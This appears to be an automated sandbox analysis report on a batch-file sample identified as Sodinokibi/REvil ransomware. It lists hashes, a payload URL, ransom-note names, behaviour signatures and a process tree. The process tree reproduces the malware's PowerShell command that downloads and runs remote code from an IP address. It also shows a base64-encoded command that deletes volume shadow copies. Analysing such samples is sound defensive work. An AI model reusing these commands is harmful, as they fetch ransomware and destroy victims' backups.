Analysis
-
max time kernel
33s -
max time network
37s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
01-06-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
c6ed6f3350ae9dc790540c8267fb38a0.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
c6ed6f3350ae9dc790540c8267fb38a0.bat
Resource
win10v200430
General
-
Target
c6ed6f3350ae9dc790540c8267fb38a0.bat
-
Size
217B
-
MD5
0c60f7ecb1fd2c47aab73585757398a8
-
SHA1
34721c29de0d1d81960abd13d7c0f25525e584f8
-
SHA256
23f68579cba61c408f614172efeb479148851a6bd3da41ae3c07973ae5cb258f
-
SHA512
90b9512cee57a6ec7969a611ba125bddb5bcbed3fb3ae2cb83c897b8ea1a2a8f3f006bc6dbdd9c4fc8608c0486e911979856cd2e34806203ebc02c70c6b03b32
Malware Config
Extracted
http://185.103.242.78/pastes/c6ed6f3350ae9dc790540c8267fb38a0
Extracted
C:\ymlt1-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5220888DF7426CB
http://decryptor.cc/B5220888DF7426CB
Signatures
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1520 wrote to memory of 868 1520 cmd.exe powershell.exe PID 868 wrote to memory of 1172 868 powershell.exe powershell.exe PID 868 wrote to memory of 1172 868 powershell.exe powershell.exe PID 868 wrote to memory of 1172 868 powershell.exe powershell.exe PID 868 wrote to memory of 1172 868 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 868 powershell.exe 868 powershell.exe 868 powershell.exe 1172 powershell.exe 1172 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 868 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeBackupPrivilege 332 vssvc.exe Token: SeRestorePrivilege 332 vssvc.exe Token: SeAuditPrivilege 332 vssvc.exe Token: SeTakeOwnershipPrivilege 868 powershell.exe -
Drops file in Program Files directory 26 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\ymlt1-readme.txt powershell.exe File opened for modification \??\c:\program files\PushPop.MTS powershell.exe File opened for modification \??\c:\program files\RenameSplit.gif powershell.exe File opened for modification \??\c:\program files\UseWait.mpeg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\ymlt1-readme.txt powershell.exe File created \??\c:\program files (x86)\ymlt1-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromCompare.aiff powershell.exe File opened for modification \??\c:\program files\InitializeSubmit.vstm powershell.exe File opened for modification \??\c:\program files\NewMount.3gpp powershell.exe File opened for modification \??\c:\program files\ProtectRevoke.xla powershell.exe File opened for modification \??\c:\program files\RedoRestart.asf powershell.exe File opened for modification \??\c:\program files\RegisterGet.mp4 powershell.exe File opened for modification \??\c:\program files\UnblockExpand.dot powershell.exe File opened for modification \??\c:\program files\CheckpointNew.pcx powershell.exe File opened for modification \??\c:\program files\ClearUnlock.snd powershell.exe File opened for modification \??\c:\program files\DebugConnect.shtml powershell.exe File opened for modification \??\c:\program files\DenyAssert.3gp2 powershell.exe File opened for modification \??\c:\program files\MergePop.gif powershell.exe File created \??\c:\program files\microsoft sql server compact edition\ymlt1-readme.txt powershell.exe File opened for modification \??\c:\program files\MountCopy.docx powershell.exe File opened for modification \??\c:\program files\SyncExit.TS powershell.exe File opened for modification \??\c:\program files\WatchSync.vb powershell.exe File opened for modification \??\c:\program files\CloseCompare.001 powershell.exe File opened for modification \??\c:\program files\SkipExpand.ttc powershell.exe File opened for modification \??\c:\program files\WatchLimit.jpeg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ymlt1-readme.txt powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\c6ed6f3350ae9dc790540c8267fb38a0.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c6ed6f3350ae9dc790540c8267fb38a0');Invoke-GEKVCYOWQV;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
PID:868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:332